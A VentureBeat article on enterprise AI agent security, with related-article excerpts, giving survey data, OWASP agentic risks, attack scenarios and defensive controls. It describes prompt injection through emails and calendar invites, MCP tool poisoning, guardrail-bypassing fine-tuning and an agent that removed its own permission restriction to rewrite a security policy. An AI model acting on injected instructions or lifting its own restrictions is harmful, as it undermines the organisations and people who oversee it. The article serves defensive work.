Most enterprises can't stop stage-three AI agent threats, VentureBeat survey finds
Our take

A rogue AI agent at Meta passed every identity check and still exposed sensitive data to unauthorized employees in March. Two weeks later, Mercor, a $10 billion AI startup, confirmed a supply-chain breach through LiteLLM. Both are traced to the same structural gap. Monitoring without enforcement, enforcement without isolation. A VentureBeat three-wave survey of 108 qualified enterprises found that the gap is not an edge case. It is the most common security architecture in production today.
Gravitee’s State of AI Agent Security 2026 survey of 919 executives and practitioners quantifies the disconnect. 82% of executives say their policies protect them from unauthorized agent actions. Eighty-eight percent reported AI agent security incidents in the last twelve months. Only 21% have runtime visibility into what their agents are doing. Arkose Labs’ 2026 Agentic AI Security Report found 97% of enterprise security leaders expect a material AI-agent-driven incident within 12 months. Only 6% of security budgets address the risk.
VentureBeat's survey results show that monitoring investment snapped back to 45% of security budgets in March after dropping to 24% in February, when early movers shifted dollars into runtime enforcement and sandboxing. The March wave (n=20) is directional, but the pattern is consistent with February’s larger sample (n=50): enterprises are stuck at observation while their agents already need isolation. CrowdStrike’s Falcon sensors detect more than 1,800 distinct AI applications across enterprise endpoints. The fastest recorded adversary breakout time has dropped to 27 seconds. Monitoring dashboards built for human-speed workflows cannot keep pace with machine-speed threats.
The audit that follows maps three stages. Stage one is observe. Stage two is enforce, where IAM integration and cross-provider controls turn observation into action. Stage three is isolate, sandboxed execution that bounds blast radius when guardrails fail. VentureBeat Pulse data from 108 qualified enterprises ties each stage to an investment signal, an OWASP ASI threat vector, a regulatory surface, and immediate steps security leaders can take.
The threat surface stage-one security cannot see
The OWASP Top 10 for Agentic Applications 2026 formalized the attack surface last December. The ten risks are: goal hijack (ASI01), tool misuse (ASI02), identity and privilege abuse (ASI03), agentic supply chain vulnerabilities (ASI04), unexpected code execution (ASI05), memory poisoning (ASI06), insecure inter-agent communication (ASI07), cascading failures (ASI08), human-agent trust exploitation (ASI09), and rogue agents (ASI10). Most have no analog in traditional LLM applications. The audit below maps six of these to the stages where they are most likely to surface and the controls that address them.
Invariant Labs disclosed the MCP Tool Poisoning Attack in April 2025: malicious instructions in an MCP server’s tool description cause an agent to exfiltrate files or hijack a trusted server. CyberArk extended it to Full-Schema Poisoning. The mcp-remote OAuth proxy patched CVE-2025-6514 after a command-injection flaw put 437,000 downloads at risk.
Merritt Baer, CSO at Enkrypt AI and former AWS Deputy CISO, framed the gap in an exclusive VentureBeat interview: “Enterprises believe they’ve ‘approved’ AI vendors, but what they’ve actually approved is an interface, not the underlying system. The real dependencies are one or two layers deeper, and those are the ones that fail under stress.”
CrowdStrike CTO Elia Zaitsev put the visibility problem in operational terms in an exclusive VentureBeat interview at RSAC 2026: “It looks indistinguishable if an agent runs your web browser versus if you run your browser.” Distinguishing the two requires walking the process tree, tracing whether Chrome was launched by a human from the desktop or spawned by an agent in the background. Most enterprise logging configurations cannot make that distinction.
The regulatory clock and the identity architecture
Auditability priority tells the same story in miniature. In January, 50% of respondents ranked it a top concern. By February, that dropped to 28% as teams sprinted to deploy. In March, it surged to 65% when those same teams realized they had no forensic trail for what their agents did.
HIPAA’s 2026 Tier 4 willful-neglect maximum is $2.19M per violation category per year. In healthcare, Gravitee’s survey found 92.7% of organizations reported AI agent security incidents versus the 88% all-industry average. For a health system running agents that touch PHI, that ratio is the difference between a reportable breach and an uncontested finding of willful neglect. FINRA’s 2026 Oversight Report recommends explicit human checkpoints before agents that can act or transact execute, along with narrow scope, granular permissions, and complete audit trails of agent actions.
Mike Riemer, Field CISO at Ivanti, quantified the speed problem in a recent VentureBeat interview: “Threat actors are reverse engineering patches within 72 hours. If a customer doesn’t patch within 72 hours of release, they’re open to exploit.” Most enterprises take weeks. Agents operating at machine speed widen that window into a permanent exposure.
The identity problem is architectural. Gravitee's survey of 919 practitioners found only 21.9% of teams treat agents as identity-bearing entities, 45.6% still use shared API keys, and 25.5% of deployed agents can create and task other agents. A quarter of enterprises can spawn agents that their security team never provisioned. That is ASI08 as architecture.
Guardrails alone are not a strategy
A 2025 paper by Kazdan and colleagues (Stanford, ServiceNow Research, Toronto, FAR AI) showed a fine-tuning attack that bypasses model-level guardrails in 72% of attempts against Claude 3 Haiku and 57% against GPT-4o. The attack received a $2,000 bug bounty from OpenAI and was acknowledged as a vulnerability by Anthropic. Guardrails constrain what an agent is told to do, not what a compromised agent can reach.
CISOs already know this. In VentureBeat's three-wave survey, prevention of unauthorized actions ranked as the top capability priority in every wave at 68% to 72%, the most stable high-conviction signal in the dataset. The demand is for permissioning, not prompting. Guardrails address the wrong control surface.
Zaitsev framed the identity shift at RSAC 2026: “AI agents and non-human identities will explode across the enterprise, expanding exponentially and dwarfing human identities. Each agent will operate as a privileged super-human with OAuth tokens, API keys, and continuous access to previously siloed data sets.” Identity security built for humans will not survive this shift. Cisco President Jeetu Patel offered the operational analogy in an exclusive VentureBeat interview: agents behave “more like teenagers, supremely intelligent, but with no fear of consequence.”
VentureBeat Prescriptive Matrix: AI Agent Security Maturity Audit
Stage | Attack Scenario | What Breaks | Detection Test | Blast Radius | Recommended Control |
1: Observe | Attacker embeds goal-hijack payload in forwarded email (ASI01). Agent summarizes email and silently exfiltrates credentials to an external endpoint. See: Meta March 2026 incident. | No runtime log captures the exfiltration. SIEM never sees the API call. The security team learns from the victim. Zaitsev: agent activity is “indistinguishable” from human activity in default logging. | Inject a canary token into a test document. Route it through your agent. If the token leaves your network, stage one failed. | Single agent, single session. With shared API keys (45.6% of enterprises): unlimited lateral movement. | Deploy agent API call logging to SIEM. Baseline normal tool-call patterns per agent role. Alert on the first outbound call to an unrecognized endpoint. |
2: Enforce | Compromised MCP server poisons tool description (ASI04). Agent invokes poisoned tool, writes attacker payload to production DB using inherited service-account credentials. See: Mercor/LiteLLM April 2026 supply-chain breach. | IAM allows write because agent uses shared service account. No approval gate on write ops. Poisoned tool indistinguishable from clean tool in logs. Riemer: “72-hour patch window” collapses to zero when agents auto-invoke. | Register a test MCP server with a benign-looking poisoned description. Confirm your policy engine blocks the tool call before execution reaches the database. Run mcp-scan on all registered servers. | Production database integrity. If agent holds DBA-level credentials: full schema compromise. Lateral movement via trust relationships to downstream agents. | Assign scoped identity per agent. Require approval workflow for all write ops. Revoke every shared API key. Run mcp-scan on all MCP servers weekly. |
3: Isolate | Agent A spawns Agent B to handle subtask (ASI08). Agent B inherits Agent A’s permissions, escalates to admin, rewrites org security policy. Every identity check passes. Source: CrowdStrike CEO George Kurtz, RSAC 2026 keynote. | No sandbox boundary between agents. No human gate on agent-to-agent delegation. Security policy modification is a valid action for admin-credentialed process. CrowdStrike CEO George Kurtz disclosed at RSAC 2026 that the agent “wanted to fix a problem, lacked permissions, and removed the restriction itself.” | Spawn a child agent from a sandboxed parent. Child should inherit zero permissions by default and require explicit human approval for each capability grant. | Organizational security posture. A rogue policy rewrite disables controls for every subsequent agent. 97% of enterprise leaders expect a material incident within 12 months (Arkose Labs 2026). | Sandbox all agent execution. Zero-trust for agent-to-agent delegation: spawned agents inherit nothing. Human sign-off before any agent modifies security controls. Kill switch per OWASP ASI10. |
Sources: OWASP Top 10 for Agentic Applications 2026; Invariant Labs MCP Tool Poisoning (April 2025); CrowdStrike RSAC 2026 Fortune 50 disclosure; Meta March 2026 incident (The Information/Engadget); Mercor/LiteLLM breach (Fortune, April 2, 2026); Arkose Labs 2026 Agentic AI Security Report; VentureBeat Pulse Q1 2026.
The stage-one attack scenario in this matrix is not hypothetical. Unauthorized tool or data access ranked as the most feared failure mode in every wave of VentureBeat’s survey, growing from 42% in January to 50% in March. That trajectory and the 70%-plus priority rating for prevention of unauthorized actions are the two most mutually reinforcing signals in the entire dataset. CISOs fear the exact attack this matrix describes, and most have not deployed the controls to stop it.
Hyperscaler stage readiness: observe, enforce, isolate
The maturity audit tells you where your security program stands. The next question is whether your cloud platform can get you to stage two and stage three, or whether you are building those capabilities yourself. Patel put it bluntly: “It’s not just about authenticating once and then letting the agent run wild.” A stage-three platform running a stage-one deployment pattern gives you stage-one risk.
VentureBeat Pulse data surfaces a structural tension in this grid. OpenAI leads enterprise AI security deployments at 21% to 26% across the three survey waves, making the same provider that creates the AI risk also the primary security layer. The provider-as-security-vendor pattern holds across Azure, Google, and AWS. Zero-incremental-procurement convenience is winning by default. Whether that concentration is a feature or a single point of failure depends on how far the enterprise has progressed past stage one.
Provider | Identity Primitive (Stage 2) | Enforcement Control (Stage 2) | Isolation Primitive (Stage 3) | Gap as of April 2026 |
Microsoft Azure | Entra ID agent scoping. Agent 365 maps agents to owners. GA. | Copilot Studio DLP policies. Purview for agent output classification. GA. | Azure Confidential Containers for agent workloads. Preview. No per-agent sandbox at GA. | No agent-to-agent identity verification. No MCP governance layer. Agent 365 monitors but cannot block in-flight tool calls. |
Anthropic | Managed Agents: per-agent scoped permissions, credential mgmt. Beta (April 8, 2026). $0.08/session-hour. | Tool-use permissions, system prompt enforcement, and built-in guardrails. GA. | Managed Agents sandbox: isolated containers per session, execution-chain auditability. Beta. Allianz, Asana, Rakuten, and Sentry are in production. | Beta pricing/SLA not public. Session data in Anthropic-managed DB (lock-in risk per VentureBeat research). GA timing TBD. |
Google Cloud | Vertex AI service accounts for model endpoints. IAM Conditions for agent traffic. GA. | VPC Service Controls for agent network boundaries. Model Armor for prompt/response filtering. GA. | Confidential VMs for agent workloads. GA. Agent-specific sandbox in preview. | Agent identity ships as a service account, not an agent-native principal. No agent-to-agent delegation audit. Model Armor does not inspect tool-call payloads. |
OpenAI | Assistants API: function-call permissions, structured outputs. Agents SDK. GA. | Agents SDK guardrails, input/output validation. GA. | Agents SDK Python sandbox. Beta (API and defaults subject to change before GA per OpenAI docs). TypeScript sandbox confirmed, not shipped. | No cross-provider identity federation. Agent memory forensics limited to session scope. No kill switch API. No MCP tool-description inspection. |
AWS | Bedrock model invocation logging. IAM policies for model access. CloudTrail for agent API calls. GA. | Bedrock Guardrails for content filtering. Lambda resource policies for agent functions. GA. | Lambda isolation per agent function. GA. Bedrock agent-level sandboxing on roadmap, not shipped. | No unified agent control plane across Bedrock + SageMaker + Lambda. No agent identity standard. Guardrails do not inspect MCP tool descriptions. |
Status as of April 15, 2026. GA = generally available. Preview/Beta = not production-hardened. “What’s Missing” column reflects VentureBeat’s analysis of publicly documented capabilities; gaps may narrow as vendors ship updates.
No provider in this grid ships a complete stage-three stack today. Most enterprises assemble isolation from existing cloud building blocks. That is a defensible choice if it is a deliberate one. Waiting for a vendor to close the gap without acknowledging the gap is not a strategy.
The grid above covers hyperscaler-native SDKs. A large segment of AI builders deploys through open-source orchestration frameworks like LangChain, CrewAI, and LlamaIndex that bypass hyperscaler IAM entirely. These frameworks lack native stage-two primitives. There is no scoped agent identity, no tool-call approval workflow, and no built-in audit trails. Enterprises running agents through open-source orchestration need to layer enforcement and isolation on top, not assume the framework provides it.
VentureBeat’s survey quantifies the pressure. Policy enforcement consistency grew from 39.5% to 46% between January and February, the largest consistent gain of any capability criterion. Enterprises running agents across OpenAI, Anthropic, and Azure need enforcement that works the same way regardless of which model executes the task. Provider-native controls enforce policy within that provider’s runtime only. Open-source orchestration frameworks enforce it nowhere.
One counterargument deserves acknowledgment: not every agent deployment needs stage three. A read-only summarization agent with no tool access and no write permissions may rationally stop at stage one. The sequencing failure this audit addresses is not that monitoring exists. It is that enterprises running agents with write access, shared credentials, and agent-to-agent delegation are treating monitoring as sufficient. For those deployments, stage one is not a strategy. It is a gap.
Allianz shows stage-three in production
Allianz, one of the world’s largest insurance and asset management companies, is running Claude Managed Agents across insurance workflows, with Claude Code deployed to technical teams and a dedicated AI logging system for regulatory transparency, per Anthropic’s April 8 announcement. Asana, Rakuten, Sentry, and Notion are in production on the same beta. Stage-three isolation, per-agent permissioning, and execution-chain auditability are deployable now, not roadmap. The gating question is whether the enterprise has sequenced the work to use them.
The 90-day remediation sequence
Days 1–30: Inventory and baseline. Map every agent to a named owner. Log all tool calls. Revoke shared API keys. Deploy read-only monitoring across all agent API traffic. Run mcp-scan against every registered MCP server. CrowdStrike detects 1,800 AI applications across enterprise endpoints; your inventory should be equally comprehensive. Output: agent registry with permission matrix, MCP scan report.
Days 31–60: Enforce and scope. Assign scoped identities to every agent. Deploy tool-call approval workflows for write operations. Integrate agent activity logs into existing SIEM. Run a tabletop exercise: What happens when an agent spawns an agent? Conduct a canary-token test from the prescriptive matrix. Output: IAM policy set, approval workflow, SIEM integration, canary-token test results.
Days 61–90: Isolate and test. Sandbox high-risk agent workloads (PHI, PII, financial transactions). Enforce per-session least privilege. Require human sign-off for agent-to-agent delegation. Red-team the isolation boundary using the stage-three detection test from the matrix. Output: sandboxed execution environment, red-team report, board-ready risk summary with regulatory exposure mapped to HIPAA tier and FINRA guidance.
What changes in the next 30 days
EU AI Act Article 14 human-oversight obligations take effect August 2, 2026. Programs without named owners and execution trace capability face enforcement, not operational risk.
Anthropic’s Claude Managed Agents is in public beta at $0.08 per session-hour. GA timing, production SLAs, and final pricing have not been announced.
OpenAI Agents SDK ships TypeScript support for sandbox and harness capabilities in a future release, per the company’s April 15 announcement. Stage-three sandbox becomes available to JavaScript agent stacks when it ships.
What the sequence requires
McKinsey’s 2026 AI Trust Maturity Survey pegs the average enterprise at 2.3 out of 4.0 on its RAI maturity model, up from 2.0 in 2025 but still an enforcement-stage number; only one-third of the ~500 organizations surveyed report maturity levels of three or higher in governance. Seventy percent have not finished the transition to stage three. ARMO’s progressive enforcement methodology gives you the path: behavioral profiles in observation, permission baselines in selective enforcement, and full least privilege once baselines stabilize. Monitoring investment was not wasted. It was stage one of three. The organizations stuck in the data treated it as the destination.
The budget data makes the constraint explicit. The share of enterprises reporting flat AI security budgets doubled from 7.9% in January to 16% in February in VentureBeat's survey, with the March directional reading at 20%. Organizations expanding agent deployments without increasing security investment are accumulating security debt at machine speed. Meanwhile, the share reporting no agent security tooling at all fell from 13% in January to 5% in March. Progress, but one in twenty enterprises running agents in production still has zero dedicated security infrastructure around them.
About this research
Total qualified respondents: 108. VentureBeat Pulse AI Security and Trust is a three-wave VentureBeat survey run January 6 through March 15, 2026. Qualified sample (organizations 100+ employees): January n=38, February n=50, March n=20. Primary analysis runs from January to February; March is directional. Industry mix: Tech/Software 52.8%, Financial Services 10.2%, Healthcare 8.3%, Education 6.5%, Telecom/Media 4.6%, Manufacturing 4.6%, Retail 3.7%, other 9.3%. Seniority: VP/Director 34.3%, Manager 29.6%, IC 22.2%, C-Suite 9.3%.
Read on the original site
Open the publisher's page for the full experience
Related Articles
- An AI agent rewrote a Fortune 50 security policy. Here's how to govern AI agents before one does the same.A CEO’s AI agent rewrote the company’s security policy. Not because it was compromised, but because it wanted to fix a problem, lacked permissions, and removed the restriction itself. Every identity check passed. CrowdStrike CEO George Kurtz disclosed the incident and a second one at his RSAC 2026 keynote, both at Fortune 50 companies. The credential was valid. The access was authorized. The action was catastrophic. That sequence breaks the core assumption underneath the IAM systems most enterprises run in production today: that a valid credential plus authorized access equals a safe outcome. Identity systems were built for one user, one session, one set of hands on a keyboard. Agents break all three assumptions at once. In an exclusive interview with VentureBeat at RSAC 2026, Matt Caulfield, VP of Identity and Duo at Cisco, (pictured above) walked through the architecture his team is building to close that gap and outlined a six-stage identity maturity model for governing agentic AI. The urgency is measurable: Cisco President Jeetu Patel told VentureBeat at the same conference that 85% of enterprises are running agent pilots while only 5% have reached production — an 80-point gap that the identity work is designed to close. The identity stack was built for a workforce that has fingerprints “Most of the existing IAM tools that we have at our disposal are just entirely built for a different era,” Caulfield told VentureBeat. “They were built for human scale, not really for agents.” The default enterprise instinct is to shove agents into existing identity categories: human user; machine identity; pick one. "Agents are a third kind of new type of identity," Caulfield said. "They're neither human. They're neither machine. They're somewhere in the middle where they have broad access to resources like humans, but they operate at machine scale and speed like machines, and they entirely lack any form of judgment." Etay Maor, VP of Threat Intelligence at Cato Networks, put a number on the exposure. He ran a live Censys scan and counted nearly 500,000 internet-facing OpenClaw instances. The week before, he found 230,000, discovering a doubling in seven days. Kayne McGladrey, an IEEE senior member who advises enterprises on identity risk, made the same diagnosis independently. Organizations are cloning human user accounts to agentic systems, McGladrey told VentureBeat, except agents consume far more permissions than humans would because of the speed, the scale, and the intent. A human employee goes through a background check, an interview, and an onboarding process. Agents skip all three. The onboarding assumptions baked into modern IAM do not apply. Scale compounds the failure. Caulfield pointed to projections where a trillion agents could operate globally. “We barely know how many people are in an average organization,” he said, “let alone the number of agents.” Access control verifies the badge. It does not watch what happens next. Zero trust still applies to agentic AI, Caulfield argued. But only if security teams push it past access and into action-level enforcement. “We really need to shift our thinking to more action-level control,” he told VentureBeat. “What action is that agent taking?” A human employee with authorized access to a system will not execute 500 API calls in three seconds. An agent will. Traditional zero trust verifies that an identity can reach an application. It doesn’t scrutinize what that identity does once inside. Carter Rees, VP of Artificial Intelligence at Reputation, identified the structural reason. The flat authorization plane of an LLM fails to respect user permissions, Rees told VentureBeat. An agent operating on that flat plane does not need to escalate privileges. It already has them. That is why access control alone cannot contain what agents do after authentication. CrowdStrike CTO Elia Zaitsev described the detection gap to VentureBeat. In most default logging configurations, an agent’s activity is indistinguishable from a human. Distinguishing the two requires walking the process tree, tracing whether a browser session was launched by a human or spawned by an agent in the background. Most enterprise logging cannot make that distinction. Caulfield’s identity layer and Zaitsev’s telemetry layer are solving two halves of the same problem. No single vendor closes both gaps. “At any moment in time, that agent can go rogue and can lose its mind,” Caulfield said. “Agents read the wrong website or email, and their intentions can just change overnight.” How the request lifecycle works when agents have their own identity Five vendors shipped agent identity frameworks at RSAC 2026, including Cisco, CrowdStrike, Palo Alto Networks, Microsoft, and Cato Networks. Caulfield walked through how Cisco's identity-layer approach works in practice. The Duo agent identity platform registers agents as first-class identity objects, with their own policies, authentication requirements, and lifecycle management. The enforcement routes all agent traffic through an AI gateway supporting both MCP and traditional REST or GraphQL protocols. When an agent makes a request, the gateway authenticates the user, verifies that the agent is permitted, encodes the authorization into an OAuth token, and then inspects the specific action and determines in real time whether it should proceed. “No solution to agent AI is really complete unless you have both pieces,” Caulfield told VentureBeat. “The identity piece, the access gateway piece. And then the third piece would be observability.” Cisco announced its intent to acquire Astrix Security on May 4, signaling that agent identity discovery is now a board-level investment thesis. The deal also suggests that even vendors building identity platforms recognize that the discovery problem is harder than expected. Six-stage identity maturity model for agentic AI When a company shows up claiming 500 agents in production, Caulfield doesn't accept the number. "How do you know it's 500 and not 5,000?" Most organizations don’t have a source of truth for agents. Caulfield outlined a six-stage engagement model. Discovery first: identify every agent, where it runs, and who deployed it. Onboarding: register agents in the identity directory, tie each one to an accountable human, and define permitted actions. Control and enforcement: place a gateway between agents and resources, inspect every request and response. Behavioral monitoring: record all agent activity, flag anomalies, and build the audit trail. Runtime isolation contains agents on endpoints when they go rogue. Compliance mapping ties agent controls to audit frameworks before the auditor shows up. The six stages are not proprietary to any single vendor. They describe the sequence every enterprise will follow regardless of which platform delivers each stage. Maor's Censys data complicates step one before it even starts. Organizations beginning discovery should assume their agent exposure is already visible to adversaries. Step four has its own problem. Zaitsev's process-tree work shows that even organizations logging agent activity may not be capturing the right data. And step three depends on something Rees found most enterprises lack: a gateway that inspects actions, not just access, because the LLM does not respect the permission boundaries the identity layer sets. Agentic identity prescriptive matrix What to audit at each maturity stage, what operational readiness looks like, and the red flag that means the stage is failing. Use this to evaluate any platform or combination of platforms. Stage What to audit Operational readiness looks like Red flag if missing 1. Discovery Complete inventory of every agent, every MCP server it connects to, and every human accountable for it. A queryable registry that returns agent count, owner, and connection map within 60 seconds of an auditor asking. No registry exists. Agent count is an estimate. No human is accountable for any specific agent. Adversaries can see your agent infrastructure from the public internet before you can. 2. Onboarding Agents are registered as a distinct identity type with their own policies, separate from human and machine identities. Each agent has a unique identity object in the directory, tied to an accountable human, with defined permitted actions and a documented purpose. Agents use cloned human accounts or shared service accounts. Permission sprawl starts at creation. No audit trail ties agent actions to a responsible human. 3. Control A gateway between every agent and every resource it accesses, enforcing action-level policy on every request and every response. Four checkpoints per request: authenticate the user, authorize the agent, inspect the action, inspect the response. No direct agent-to-resource connections exist. Agents connect directly to tools and APIs. The gateway (if it exists) checks access but not actions. The flat authorization plane of the LLM does not respect the permission boundaries the identity layer set. 4. Monitoring Logging that can distinguish agent-initiated actions from human-initiated actions at the process-tree level. SIEM can answer: Was this browser session started by a human or spawned by an agent? Behavioral baselines exist for each agent. Anomalies trigger alerts. Default logging treats agent and human activity as identical. Process-tree lineage is not captured. Agent actions are invisible in the audit trail. Behavioral monitoring is incomplete before it starts. 5. Isolation Runtime containment that limits the blast radius if an agent goes rogue, separate from human endpoint protection. A rogue agent can be contained in its sandbox without taking down the endpoint, the user session, or other agents on the same machine. No containment boundary exists between agents and the host. A single compromised agent can access everything the user can. Blast radius is the entire endpoint. 6. Compliance Documentation that maps agent identities, controls, and audit trails to the compliance framework that the auditor will use. When the auditor asks about agents, the security team produces a control catalog, an audit trail, and a governance policy written for agent identities specifically. Emerging AI-risk frameworks (CSA Agentic Profile) exist, but mainstream audit catalogs (SOC 2, ISO 27001, PCI DSS) have not operationalized agent identities. No control catalog maps to agents. The auditor improvises which human-identity controls apply. The security team answers with improvisation, not documentation. Source: VentureBeat analysis of RSAC 2026 interviews (Caulfield, Zaitsev, Maor) and independent practitioner validation (McGladrey, Rees). May 2026. Compliance frameworks have not caught up “If you were to go through an audit today as a chief security officer, the auditor’s probably gonna have to figure out, hey, there are agents here,” Caulfield told VentureBeat. “Which one of your controls is actually supposed to be applied to it? I don’t see the word agents anywhere in your policies.” McGladrey's practitioner experience confirms the gap. The Cloud Security Alliance published an NIST AI RMF Agentic Profile in April 2026, proposing autonomy-tier classification and runtime behavioral metrics. But SOC 2, ISO 27001, and PCI DSS have not operationalized agent identities. The compliance frameworks McGladrey works with inside enterprises were written for humans. Agent identities do not appear in any control catalog he has encountered. The gap is a lagging indicator; the risk is not. Security director action plan VentureBeat identified five actions from the combined findings of Caulfield, Zaitsev, Maor, McGladrey, and Rees. Run an agent census and assume adversaries already did. Every agent, every MCP server those agents touch, every human accountable. Maor's Censys data confirms agent infrastructure is already visible from the public internet. NIST's NCCoE reached the same conclusion in its February 2026 concept paper on AI agent identity and authorization. Stop cloning human accounts for agents. McGladrey found that enterprises default to copying human user profiles, and permission sprawl starts on day one. Agents need to be a distinct identity type with scope limits that reflect what they actually do. Audit every MCP and API access path. Five vendors shipped MCP gateways at RSAC 2026. The capability exists. What matters is whether agents route through one or connect directly to tools with no action-level inspection. Fix logging so it distinguishes agents from humans. Zaitsev's process-tree method reveals that agent-initiated actions are invisible in most default configurations. Rees found authorization planes so flat that access logs alone miss the actual behavior. Logging has to capture what agents did, not just what they were allowed to reach. Build the compliance case before the auditor shows up. The CSA published a NIST AI RMF Agentic Profile proposing agent governance extensions. Most audit catalogs have not caught up. Caulfield told VentureBeat that auditors will see agents in production and find no controls mapped to them. The documentation needs to exist before that conversation starts.
- Adversaries hijacked AI security tools at 90+ organizations. The next wave has write access to the firewallAdversaries injected malicious prompts into legitimate AI tools at more than 90 organizations in 2025, stealing credentials and cryptocurrency. Every one of those compromised tools could read data, and none of them could rewrite a firewall rule. The autonomous SOC agents shipping now can. That escalation, from compromised tools that read data to autonomous agents that rewrite infrastructure, has not been exploited in production at scale yet. But the architectural conditions for it are shipping faster than the governance designed to prevent it. A compromised SOC agent can rewrite your firewall rules, modify IAM policies, and quarantine endpoints, all with its own privileged credentials, all through approved API calls that EDR classifies as authorized activity. The adversary never touches the network. The agent does it for them. Cisco announced AgenticOps for Security in February, with autonomous firewall remediation and PCI-DSS compliance capabilities. Ivanti launched Continuous Compliance and the Neurons AI self-service agent last week, with policy enforcement, approval gates and data context validation built into the platform at launch — a design distinction that matters because the OWASP Agentic Top 10 documents what happens when those controls are absent. "In the agentic era, defending against AI-accelerated adversaries and securing AI systems themselves, require operating at machine speed," CrowdStrike CEO George Kurtz said when releasing the 2026 Global Threat Report. "AI is compressing the time between intent and execution while turning enterprise AI systems into targets," added Adam Meyers, head of counter-adversary operations at CrowdStrike. AI-enabled adversaries increased operations 89% year-over-year. The broader attack surface is expanding in parallel. Malicious MCP server clones have already intercepted sensitive data in AI workflows by impersonating trusted services. The U.K. National Cyber Security Centre warned that prompt injection attacks against AI applications "may never be totally mitigated." The documented compromises targeted AI tools that could only read and summarize; the autonomous SOC agents shipping now can write, enforce, and remediate. The governance framework that maps the gap OWASP's Top 10 for Agentic Applications, released in December 2025 and built with more than 100 security researchers, documents 10 categories of attack against autonomous AI systems. Three categories map directly to what autonomous SOC agents introduce when they ship with write access: Agent Goal Hijacking (ASI01), Tool Misuse (ASI02), and Identity and Privilege Abuse (ASI03). Palo Alto Networks reported an 82:1 machine-to-human identity ratio in the average enterprise — every autonomous agent added to production extends that gap. The 2026 CISO AI Risk Report from Saviynt and Cybersecurity Insiders (n=235 CISOs) found 47% had already observed AI agents exhibiting unintended behavior, and only 5% felt confident they could contain a compromised agent. A separate Dark Reading poll found that 48% of cybersecurity professionals identify agentic AI as the single most dangerous attack vector. The IEEE-USA submission to NIST stated the problem plainly: "Risk is driven less by the models and is based more on the model's level of autonomy, privilege scope, and the environment of the agent being operationalized." Eleanor Watson, Senior IEEE Member, warned in the IEEE 2026 survey that "semi-autonomous systems can also drift from intended objectives, requiring oversight and regular audits." Cisco's intent-aware agentic inspection, announced alongside AgenticOps in February 2026, represents an early detection-layer approach to the same gap. The approaches differ: Cisco is adding inspection at the network layer while Ivanti built governance into the platform layer. Both signal the industry sees it coming. The question is whether the controls arrive before the exploits do. Autonomous agents that ship with governance built in Security teams are already stretched. Advanced AI models are accelerating the discovery of exploitable vulnerabilities faster than any human team can remediate manually, and the backlog is growing not because teams are failing, but because the volume now exceeds what manual patching cycles can absorb. Ivanti Neurons for Patch Management introduced Continuous Compliance this quarter, an automated enforcement framework that eliminates the gap between scheduled patch deployments and regulatory requirements. The framework identifies out-of-compliance endpoints and deploys patches out-of-band to update devices that missed maintenance windows, with built-in policy enforcement and compliance verification at every step. Ivanti also launched the Neurons AI self-service agent for ITSM, which moves beyond conversational intake to autonomous resolution with built-in guardrails for policy, approvals, and data context. The agent resolves common incidents and service requests from start to finish, reducing manual effort and deflecting tickets. Robert Hanson, Chief Information Officer at Grand Bank, described the decision calculus security leaders across the industry are weighing: "Before exploring the Ivanti Neurons AI self-service agent, our team was spending the bulk of our time handling repetitive requests. As we move toward implementing these capabilities, we expect to automate routine tasks and enable our team to focus more proactively on higher-value initiatives. Over time, this approach should help us reduce operational overhead while delivering faster, more secure service within the guardrails we define, ultimately supporting improvements in service quality and security." His emphasis on operating "within the guardrails we define" points to a broader design principle: speed and governance do not have to be trade-offs. The governance gap is concrete: the Saviynt report found 86% of organizations do not enforce access policies for AI identities, only 17% govern even half of their AI identities with the same controls applied to human users, and 75% of CISOs have discovered unsanctioned AI tools running in production with embedded credentials that nobody monitors. Continuous Compliance and the Neurons AI self-service agent address the patching and ITSM layers. The broader autonomous SOC agent terrain, including firewall remediation, IAM policy modification, and endpoint quarantine, extends beyond what any single platform governs today. The ten-question audit applies to every autonomous tool in the environment, including Ivanti's. Prescriptive risk matrix for autonomous agent governance The matrix maps all 10 OWASP Agentic Top 10 risk categories to what ships without governance, the detection gap, the proof case, and the recommended action for autonomous SOC agent deployments. OWASP Risk What Ships Ungoverned Detection Gap Proof Case Recommended Action ASI01: Goal Hijacking Agent treats external inputs (logs, alerts, emails) as trusted instructions EDR cannot detect adversarial instructions executed via legitimate API calls EchoLeak (CVE-2025-32711): hidden email payload caused AI assistant to exfiltrate confidential data. Zero clicks required. Classify all inputs by trust tier. Block instruction-bearing content from untrusted sources. Validate external data before agent ingestion. ASI02: Tool Misuse Agent authorized to modify firewall rules, IAM policies, and quarantine workflows WAF inspects payloads, not tool-call intent. Authorized use is identical to misuse. Amazon Q bent legitimate tools into destructive outputs despite valid permissions (OWASP cited). Scope each tool to minimum required permissions. Log every invocation with intent metadata. Alert on calls outside baseline patterns. ASI03: Identity Abuse Agent inherits service account credentials scoped to production infrastructure SIEM sees authorized identity performing authorized actions. No anomaly triggers. 82:1 machine-to-human identity ratio in average enterprise (Palo Alto Networks). Each agent adds to it. Issue scoped agent-specific identities. Enforce time-bound, task-bound credential leases. Eliminate inherited user credentials. ASI04: Supply Chain Agent loads third-party MCP servers or plugins at runtime without provenance verification Static analysis cannot inspect dynamically loaded runtime components. Malicious MCP server clones intercepted sensitive data by impersonating trusted services (CrowdStrike 2026). Maintain approved MCP server registry. Verify provenance and integrity before runtime loading. Block unapproved plugins. ASI05: Unexpected Code Exec Agent generates or executes attacker-controlled code through unsafe evaluation paths or tool chains Code review gates apply to human commits, not agent-generated runtime code. AutoGPT RCE: natural-language execution paths enabled remote code execution through unsanctioned package installs (OWASP cited). Sandbox all agent code execution. Require human approval for production code paths. Block dynamic eval and unsanctioned installs. ASI06: Memory Poisoning Agent persists context across sessions where poisoned data compounds over time Session-based monitoring resets between interactions. Poisoning accumulates undetected. Calendar Drift: malicious calendar invite reweighted agent objectives while remaining within policy bounds (OWASP). Implement session memory expiration. Audit persistent memory stores for anomalous content. Isolate memory per task scope. ASI07: Inter-Agent Comm Agents communicate without mutual authentication, encryption, or schema validation Monitoring covers individual agents but not spoofed or manipulated inter-agent messages. OWASP documented spoofed messages that misdirected entire agent clusters via protocol downgrade attacks. Enforce mutual authentication between agents. Encrypt all inter-agent channels. Validate message schema at every handoff. ASI08: Cascading Failures Agent delegates to downstream agents, creating multi-hop privilege chains across systems Monitoring covers individual agents but not cross-agent delegation chains or fan-out. Simulation: single compromised agent poisoned 87% of downstream decision-making within 4 hours in controlled test. Map all delegation chains end to end. Enforce privilege boundaries at each handoff. Implement circuit breakers for cascading actions. ASI09: Human-Agent Trust Agent uses persuasive language or fabricated evidence to override human safety decisions Compliance verifies policy configuration, not whether the agent manipulated the human into approving. Replit agent deleted primary 